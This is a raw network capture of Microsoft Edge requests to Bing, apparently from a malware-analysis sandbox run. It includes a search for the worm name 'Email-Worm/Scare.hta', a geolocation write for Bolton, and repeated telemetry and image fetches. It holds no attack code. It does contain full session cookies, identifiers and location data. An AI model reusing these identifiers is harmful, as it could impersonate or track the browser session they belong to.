cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0

Response

HTTP/2.0 200

content-type: application/json
access-control-allow-origin: *
cache-control: public, max-age=21600
content-encoding: br
last-modified: Wed, 29 Jan 2025 03:32:58 GMT
vary: Accept-Encoding
x-ms-request-id: c8384373-301e-0041-6953-923f6f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20250311T070000Z-r18f6fbf7cbsglx7hC1DB1syr800000003p000000000aqmr
x-fd-int-roxy-purgeid: 82974704
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
x-ceto-ref: 67cfdf7099724a36915e299df547f539|AFD:67cfdf7099724a36915e299df547f539|2025-03-11T07:00:00.904Z
content-length: 50113
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df2fd
GET

https://www.bing.com/geolocation/write?isDevLoc=false&lat=53.5682487487793&lon=-2.491116523742676&dispName=Bolton%252C%2520Greater%2520Manchester&isEff=1&effLocType=4&clientsid=undefined

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /geolocation/write?isDevLoc=false&lat=53.5682487487793&lon=-2.491116523742676&dispName=Bolton%252C%2520Greater%2520Manchester&isEff=1&effLocType=4&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67d0f34f71b54f1da61ad9ad7443889d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-yj8LrWKJ+QKhJ/RCENpgwpyOWiel7EWBf+lzSy193/k='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 04BBE1B58B544B54AAF38CCC9186E170 Ref B: LON04EDGE0608 Ref C: 2025-03-12T02:37:03Z
date: Wed, 12 Mar 2025 02:37:03 GMT
set-cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E; expires=Mon, 06-Apr-2026 02:37:03 GMT; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:03 GMT; path=/; secure; SameSite=None
set-cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:03 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df30d
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022427%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%2210%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1741747022402%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022427%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:12 GMT
etag: 0x8DCDC608780CE8B
content-length: 512
content-type: image/svg+xml
content-md5: G0HPjgI1nZPfetni3YDkOw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bfe80271-601e-0028-1e2e-179d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=69565
expires: Wed, 12 Mar 2025 21:56:28 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df36b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022429%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:02:04 GMT
etag: 0x8DCDC5E6A2D8636
content-length: 349
content-type: image/svg+xml
content-md5: iRh5eBPrKqjGuvgWi/nStw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 853c015d-c01e-0061-6298-16ae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=276190
expires: Sat, 15 Mar 2025 07:20:13 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df36c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 696
cache-control: public, max-age=1351210
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_HIT from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df36d
x-check-cacheable: YES
GET

https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 767
x-check-cacheable: YES
cache-control: public, max-age=939581
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df36e
GET

https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 557
x-check-cacheable: YES
cache-control: public, max-age=464332
date: Wed, 12 Mar 2025 02:37:03 GMT
x-cache: TCP_MISS from a95-101-143-215.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0-bb2a2774a48042877147cbed2bad8ca6) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df370
GET

https://th.bing.com/th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=18&h=18&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=ODLS.b2099a11-ca12-45ce-bede-5df940e38a48&w=18&h=18&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
